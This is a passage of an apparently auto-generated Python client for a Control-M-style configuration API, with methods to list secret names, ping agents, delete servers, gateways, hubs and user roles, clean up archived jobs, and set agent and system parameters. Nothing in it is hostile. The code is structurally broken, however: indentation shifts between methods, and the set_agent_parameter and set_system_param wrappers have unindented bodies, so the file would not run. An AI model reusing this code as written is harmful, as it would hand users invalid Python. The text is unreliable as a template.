    # 'server' and 'agent' are substituted into the URL path template.
    path_params = {}
    if 'server' in params:
        path_params['server'] = params['server']  # noqa: E501
    if 'agent' in params:
        path_params['agent'] = params['agent']  # noqa: E501
    # Optional 'name' filter goes on the query string.
    query_params = []
    if 'name' in params:
        query_params.append(('name', params['name']))  # noqa: E501
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501
    return self.api_client.call_api(
        '/config/server/{server}/agent/{agent}/mft/zostemplates', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[ZosTemplateData]',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def list_secrets(self, **kwargs):  # noqa: E501
    """Get list of secret names  # noqa: E501

    Retrieve the names of all secrets stored in the vault. Synchronous
    by default; pass ``async_req=True`` to receive the request thread
    instead.

    >>> thread = api.list_secrets(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :return: StringListResult
    If the method is called asynchronously,
    returns the request thread.
    """
    # Both the async (thread) and sync (data) paths simply forward the
    # low-level call's result.
    kwargs['_return_http_data_only'] = True
    return self.list_secrets_with_http_info(**kwargs)  # noqa: E501
def list_secrets_with_http_info(self, **kwargs):  # noqa: E501
    """Get list of secret names  # noqa: E501

    Get the list of names of all the secrets in the vault  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.list_secrets_with_http_info(async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :return: StringListResult
    If the method is called asynchronously,
    returns the request thread.
    """
    # This endpoint takes no parameters of its own; only the generic
    # request-control options are accepted.
    all_params = []  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    params = locals()
    # Reject unknown keyword arguments, flatten the known ones into params.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_secrets" % key
            )
        params[key] = val
    del params['kwargs']
    collection_formats = {}
    path_params = {}
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501
    return self.api_client.call_api(
        '/config/secrets', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='StringListResult',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def ping_agent(self, server, agent, **kwargs):  # noqa: E501
    """ping to the agent in the Server  # noqa: E501

    Ping an Agent. Synchronous by default; pass ``async_req=True`` to
    receive the request thread instead.

    >>> thread = api.ping_agent(server, agent, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: The Server. (required)
    :param str agent: The Agent. (required)
    :param PingAgentParams body:
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Forward straight to the low-level variant; the async and sync
    # cases both return exactly what it returns.
    kwargs['_return_http_data_only'] = True
    return self.ping_agent_with_http_info(server, agent, **kwargs)  # noqa: E501
def ping_agent_with_http_info(self, server, agent, **kwargs):  # noqa: E501
    """ping to the agent in the Server  # noqa: E501

    Ping an Agent.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.ping_agent_with_http_info(server, agent, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str server: The Server. (required)
    :param str agent: The Agent. (required)
    :param PingAgentParams body:
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Accepted keyword arguments: endpoint parameters plus the generic
    # request-control options.
    all_params = ['server', 'agent', 'body']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    params = locals()
    # Reject unknown keyword arguments, flatten the known ones into params.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method ping_agent" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'server' is set
    if ('server' not in params or
            params['server'] is None):
        raise ValueError("Missing the required parameter `server` when calling `ping_agent`")  # noqa: E501
    # verify the required parameter 'agent' is set
    if ('agent' not in params or
            params['agent'] is None):
        raise ValueError("Missing the required parameter `agent` when calling `ping_agent`")  # noqa: E501
    collection_formats = {}
    # 'server' and 'agent' are substituted into the URL path template.
    path_params = {}
    if 'server' in params:
        path_params['server'] = params['server']  # noqa: E501
    if 'agent' in params:
        path_params['agent'] = params['agent']  # noqa: E501
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    # Optional request body (PingAgentParams) is sent as the POST payload.
    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['*/*'])  # noqa: E501
    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501
    return self.api_client.call_api(
        '/config/server/{server}/agent/{agent}/ping', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def recycle_item(self, id, **kwargs):  # noqa: E501
    """recycle item  # noqa: E501

    Recycle an item. Synchronous by default; pass ``async_req=True``
    to receive the request thread instead.

    >>> thread = api.recycle_item(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str id: item data (required)
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Both the async (thread) and sync (data) paths simply forward the
    # low-level call's result.
    kwargs['_return_http_data_only'] = True
    return self.recycle_item_with_http_info(id, **kwargs)  # noqa: E501
def recycle_item_with_http_info(self, id, **kwargs):  # noqa: E501
    """recycle item  # noqa: E501

    Recycle an item  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.recycle_item_with_http_info(id, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str id: item data (required)
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Accepted keyword arguments: the endpoint parameter plus the
    # generic request-control options.
    all_params = ['id']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    params = locals()
    # Reject unknown keyword arguments, flatten the known ones into params.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method recycle_item" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params or
            params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `recycle_item`")  # noqa: E501
    collection_formats = {}
    # 'id' is substituted into the URL path template below.
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']  # noqa: E501
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501
    return self.api_client.call_api(
        '/config/item/{id}/recycle', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def remove_controlm_server(self, server, **kwargs):  # noqa: E501
    """Delete Server  # noqa: E501

    Delete a Server definition. Synchronous by default; pass
    ``async_req=True`` to receive the request thread instead.

    >>> thread = api.remove_controlm_server(server, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: Server host name. (required)
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Forward straight to the low-level variant; the async and sync
    # cases both return exactly what it returns.
    kwargs['_return_http_data_only'] = True
    return self.remove_controlm_server_with_http_info(server, **kwargs)  # noqa: E501
def remove_controlm_server_with_http_info(self, server, **kwargs):  # noqa: E501
    """Delete Server  # noqa: E501

    Delete Server  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.remove_controlm_server_with_http_info(server, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str server: Server host name. (required)
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Accepted keyword arguments: the endpoint parameter plus the
    # generic request-control options.
    all_params = ['server']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    params = locals()
    # Reject unknown keyword arguments, flatten the known ones into params.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method remove_controlm_server" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'server' is set
    if ('server' not in params or
            params['server'] is None):
        raise ValueError("Missing the required parameter `server` when calling `remove_controlm_server`")  # noqa: E501
    collection_formats = {}
    # 'server' is substituted into the URL path template below.
    path_params = {}
    if 'server' in params:
        path_params['server'] = params['server']  # noqa: E501
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501
    return self.api_client.call_api(
        '/config/server/{server}', 'DELETE',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def remove_gateway(self, gateway_name, **kwargs):  # noqa: E501
    """remove gateway.  # noqa: E501

    Remove an MFT gateway. Synchronous by default; pass
    ``async_req=True`` to receive the request thread instead.

    >>> thread = api.remove_gateway(gateway_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str gateway_name: gateway name (required)
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Both the async (thread) and sync (data) paths simply forward the
    # low-level call's result.
    kwargs['_return_http_data_only'] = True
    return self.remove_gateway_with_http_info(gateway_name, **kwargs)  # noqa: E501
def remove_gateway_with_http_info(self, gateway_name, **kwargs):  # noqa: E501
    """remove gateway.  # noqa: E501

    remove gateway.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.remove_gateway_with_http_info(gateway_name, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str gateway_name: gateway name (required)
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Accepted keyword arguments: the endpoint parameter plus the
    # generic request-control options.
    all_params = ['gateway_name']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    params = locals()
    # Reject unknown keyword arguments, flatten the known ones into params.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method remove_gateway" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'gateway_name' is set
    if ('gateway_name' not in params or
            params['gateway_name'] is None):
        raise ValueError("Missing the required parameter `gateway_name` when calling `remove_gateway`")  # noqa: E501
    collection_formats = {}
    # Note the snake_case -> camelCase mapping for the path placeholder.
    path_params = {}
    if 'gateway_name' in params:
        path_params['gatewayName'] = params['gateway_name']  # noqa: E501
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501
    return self.api_client.call_api(
        '/config/mft/gateway/{gatewayName}', 'DELETE',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def remove_hub_from_cluster(self, agentname, **kwargs):  # noqa: E501
    """remove hub from cluster.  # noqa: E501

    Remove a hub (agent) from the MFT cluster. Synchronous by default;
    pass ``async_req=True`` to receive the request thread instead.

    >>> thread = api.remove_hub_from_cluster(agentname, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str agentname: Agent name (required)
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Forward straight to the low-level variant; the async and sync
    # cases both return exactly what it returns.
    kwargs['_return_http_data_only'] = True
    return self.remove_hub_from_cluster_with_http_info(agentname, **kwargs)  # noqa: E501
def remove_hub_from_cluster_with_http_info(self, agentname, **kwargs):  # noqa: E501
    """remove hub from cluster.  # noqa: E501

    remove hub from cluster.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.remove_hub_from_cluster_with_http_info(agentname, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str agentname: Agent name (required)
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Accepted keyword arguments: the endpoint parameter plus the
    # generic request-control options.
    all_params = ['agentname']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    params = locals()
    # Reject unknown keyword arguments, flatten the known ones into params.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method remove_hub_from_cluster" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'agentname' is set
    if ('agentname' not in params or
            params['agentname'] is None):
        raise ValueError("Missing the required parameter `agentname` when calling `remove_hub_from_cluster`")  # noqa: E501
    collection_formats = {}
    # 'agentname' is substituted into the URL path template below.
    path_params = {}
    if 'agentname' in params:
        path_params['agentname'] = params['agentname']  # noqa: E501
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501
    return self.api_client.call_api(
        '/config/mft/cluster/hub/{agentname}', 'DELETE',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def remove_role_from_user(self, user, role, **kwargs):  # noqa: E501
    """Remove a role from a user  # noqa: E501

    Detach a role from a user. Synchronous by default; pass
    ``async_req=True`` to receive the request thread instead.

    >>> thread = api.remove_role_from_user(user, role, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str user: Name of user (required)
    :param str role: Name of role (required)
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Both the async (thread) and sync (data) paths simply forward the
    # low-level call's result.
    kwargs['_return_http_data_only'] = True
    return self.remove_role_from_user_with_http_info(user, role, **kwargs)  # noqa: E501
def remove_role_from_user_with_http_info(self, user, role, **kwargs):  # noqa: E501
    """Remove a role from a user  # noqa: E501

    Remove a role from a user  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.remove_role_from_user_with_http_info(user, role, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str user: Name of user (required)
    :param str role: Name of role (required)
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Accepted keyword arguments: endpoint parameters plus the generic
    # request-control options.
    all_params = ['user', 'role']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    params = locals()
    # Reject unknown keyword arguments, flatten the known ones into params.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method remove_role_from_user" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'user' is set
    if ('user' not in params or
            params['user'] is None):
        raise ValueError("Missing the required parameter `user` when calling `remove_role_from_user`")  # noqa: E501
    # verify the required parameter 'role' is set
    if ('role' not in params or
            params['role'] is None):
        raise ValueError("Missing the required parameter `role` when calling `remove_role_from_user`")  # noqa: E501
    collection_formats = {}
    # 'user' and 'role' are substituted into the URL path template.
    path_params = {}
    if 'user' in params:
        path_params['user'] = params['user']  # noqa: E501
    if 'role' in params:
        path_params['role'] = params['role']  # noqa: E501
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501
    return self.api_client.call_api(
        '/config/authorization/user/{user}/role/{role}', 'DELETE',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def send_archive_cleanup_request(self, **kwargs):  # noqa: E501
    """Deletes data (jobs including outputs and logs) from the Workload Archiving database.  # noqa: E501

    Delete archived jobs (including outputs and logs) matching the
    given search criteria from the Workload Archiving database.
    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead.

    >>> thread = api.send_archive_cleanup_request(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str application: Job's application.
    :param str application_exceptions: Cleanup should skip job's application that are mentioned in exceptions
    :param str sub_application: Job's sub application
    :param str sub_application_exceptions: Job's sub application exception
    :param str ctm: server name
    :param str server: Server name
    :param str ctm_exceptions: server exceptions
    :param str server_exceptions: Server exceptions
    :param str folder: Job's folder.
    :param str folder_exceptions: Job's folder exceptions
    :param str jobname: Job's name
    :param str jobname_exceptions: Job's name exceptions
    :param str library: Job's library
    :param str library_exceptions: Job's library exceptions
    :param str rule_name: Job's archive rule
    :param str job_status: The job's end status.
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Both the async (thread) and sync (data) paths simply forward the
    # low-level call's result, so a single return covers both.
    kwargs['_return_http_data_only'] = True
    return self.send_archive_cleanup_request_with_http_info(**kwargs)  # noqa: E501
    def send_archive_cleanup_request_with_http_info(self, **kwargs):  # noqa: E501
        """Deletes data (jobs including outputs and logs) from the Workload Archiving database.  # noqa: E501

        Deletes data (jobs including outputs and logs) by search criteria from the Workload Archiving database.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.send_archive_cleanup_request_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str application: Job's application.
        :param str application_exceptions: Cleanup should skip job's application that are mentioned in exceptions
        :param str sub_application: Job's sub application
        :param str sub_application_exceptions: Job's sub application exception
        :param str ctm: server name
        :param str server: Server name
        :param str ctm_exceptions: server exceptions
        :param str server_exceptions: Server exceptions
        :param str folder: Job's folder.
        :param str folder_exceptions: Job's folder exceptions
        :param str jobname: Job's name
        :param str jobname_exceptions: Job's name exceptions
        :param str library: Job's library
        :param str library_exceptions: Job's library exceptions
        :param str rule_name: Job's archive rule
        :param str job_status: The job's end status.
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Keyword arguments this endpoint accepts (all optional filters),
        # plus the generic transport-control kwargs appended below.
        all_params = ['application', 'application_exceptions', 'sub_application', 'sub_application_exceptions', 'ctm', 'server', 'ctm_exceptions', 'server_exceptions', 'folder', 'folder_exceptions', 'jobname', 'jobname_exceptions', 'library', 'library_exceptions', 'rule_name', 'job_status']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # NOTE: locals() also captures 'self' and 'all_params'; only the
        # whitelisted keys merged in from kwargs below are ever read back.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            # Reject typo'd/unknown keyword arguments early with a clear error.
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method send_archive_cleanup_request" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        # Translate the snake_case Python names into the API's camelCase
        # query-string keys; only supplied filters are sent.
        query_params = []
        if 'application' in params:
            query_params.append(('application', params['application']))  # noqa: E501
        if 'application_exceptions' in params:
            query_params.append(('applicationExceptions', params['application_exceptions']))  # noqa: E501
        if 'sub_application' in params:
            query_params.append(('subApplication', params['sub_application']))  # noqa: E501
        if 'sub_application_exceptions' in params:
            query_params.append(('subApplicationExceptions', params['sub_application_exceptions']))  # noqa: E501
        if 'ctm' in params:
            query_params.append(('ctm', params['ctm']))  # noqa: E501
        if 'server' in params:
            query_params.append(('server', params['server']))  # noqa: E501
        if 'ctm_exceptions' in params:
            query_params.append(('ctmExceptions', params['ctm_exceptions']))  # noqa: E501
        if 'server_exceptions' in params:
            query_params.append(('serverExceptions', params['server_exceptions']))  # noqa: E501
        if 'folder' in params:
            query_params.append(('folder', params['folder']))  # noqa: E501
        if 'folder_exceptions' in params:
            query_params.append(('folderExceptions', params['folder_exceptions']))  # noqa: E501
        if 'jobname' in params:
            query_params.append(('jobname', params['jobname']))  # noqa: E501
        if 'jobname_exceptions' in params:
            query_params.append(('jobnameExceptions', params['jobname_exceptions']))  # noqa: E501
        if 'library' in params:
            query_params.append(('library', params['library']))  # noqa: E501
        if 'library_exceptions' in params:
            query_params.append(('libraryExceptions', params['library_exceptions']))  # noqa: E501
        if 'rule_name' in params:
            query_params.append(('ruleName', params['rule_name']))  # noqa: E501
        if 'job_status' in params:
            query_params.append(('jobStatus', params['job_status']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        # DELETE request carries no body; all criteria go in the query string.
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['Bearer']  # noqa: E501

        return self.api_client.call_api(
            '/config/archive/cleanup', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SuccessData',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def set_agent_parameter(self, server, agent, name, **kwargs): # noqa: E501
"""set agent parameter # noqa: E501
Set the value of the specified parameter in the specified agent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_agent_parameter(server, agent, name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the agent is connected to. (required)
:param str agent: The name of the agent to update. (required)
:param str name: The parameter name. (required)
:param OptionalValue body: The new parameter value.
:return: KeyValue
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.set_agent_parameter_with_http_info(server, agent, name, **kwargs) # noqa: E501
else:
(data) = self.set_agent_parameter_with_http_info(server, agent, name, **kwargs) # noqa: E501
return data
    def set_agent_parameter_with_http_info(self, server, agent, name, **kwargs):  # noqa: E501
        """set agent parameter  # noqa: E501

        Set the value of the specified parameter in the specified agent.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.set_agent_parameter_with_http_info(server, agent, name, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server the agent is connected to. (required)
        :param str agent: The name of the agent to update. (required)
        :param str name: The parameter name. (required)
        :param OptionalValue body: The new parameter value.
        :return: KeyValue
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Accepted arguments: the three path params, the optional request
        # body, and the generic transport-control kwargs appended below.
        all_params = ['server', 'agent', 'name', 'body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # NOTE: locals() also captures 'self' and 'all_params'; only the
        # whitelisted keys merged in from kwargs below are ever read back.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            # Reject typo'd/unknown keyword arguments early with a clear error.
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method set_agent_parameter" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'server' is set
        if ('server' not in params or
                params['server'] is None):
            raise ValueError("Missing the required parameter `server` when calling `set_agent_parameter`")  # noqa: E501
        # verify the required parameter 'agent' is set
        if ('agent' not in params or
                params['agent'] is None):
            raise ValueError("Missing the required parameter `agent` when calling `set_agent_parameter`")  # noqa: E501
        # verify the required parameter 'name' is set
        if ('name' not in params or
                params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `set_agent_parameter`")  # noqa: E501

        collection_formats = {}

        # Substitutions for the {server}/{agent}/{name} URL placeholders.
        path_params = {}
        if 'server' in params:
            path_params['server'] = params['server']  # noqa: E501
        if 'agent' in params:
            path_params['agent'] = params['agent']  # noqa: E501
        if 'name' in params:
            path_params['name'] = params['name']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        # The new parameter value (if given) travels as the request body.
        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['*/*'])  # noqa: E501

        # Authentication setting
        auth_settings = ['Bearer']  # noqa: E501

        return self.api_client.call_api(
            '/config/server/{server}/agent/{agent}/param/{name}', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='KeyValue',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def set_system_param(self, body, name, **kwargs): # noqa: E501
"""set value of a an em system parameter # noqa: E501
Set value of an enterprise management system parameter # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_system_param(body, name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Value body: Param new value (required)
:param str name: Parameter name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.set_system_param_with_http_info(body, name, **kwargs) # noqa: E501
else:
(data) = self.set_system_param_with_http_info(body, name, **kwargs) # noqa: E501
return data
    def set_system_param_with_http_info(self, body, name, **kwargs):  # noqa: E501
        """set value of an em system parameter  # noqa: E501

        Set value of an enterprise management system parameter  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.set_system_param_with_http_info(body, name, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param Value body: Param new value (required)
        :param str name: Parameter name (required)
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Accepted arguments: the body and path param, plus the generic
        # transport-control kwargs appended below.
        all_params = ['body', 'name']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # NOTE: locals() also captures 'self' and 'all_params'; only the
        # whitelisted keys merged in from kwargs below are ever read back.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            # Reject typo'd/unknown keyword arguments early with a clear error.
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method set_system_param" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `set_system_param`")  # noqa: E501
        # verify the required parameter 'name' is set
        if ('name' not in params or
                params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `set_system_param`")  # noqa: E501

        collection_formats = {}

